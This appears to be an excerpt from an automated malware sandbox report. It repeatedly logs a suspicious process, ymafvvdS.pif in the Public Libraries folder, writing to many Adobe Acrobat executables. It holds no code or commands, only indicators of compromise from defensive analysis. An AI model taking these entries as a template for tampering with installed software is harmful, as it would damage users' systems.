                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
                  Source: C:\Users\Public\Libraries\ymafvvdS.pifFile written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
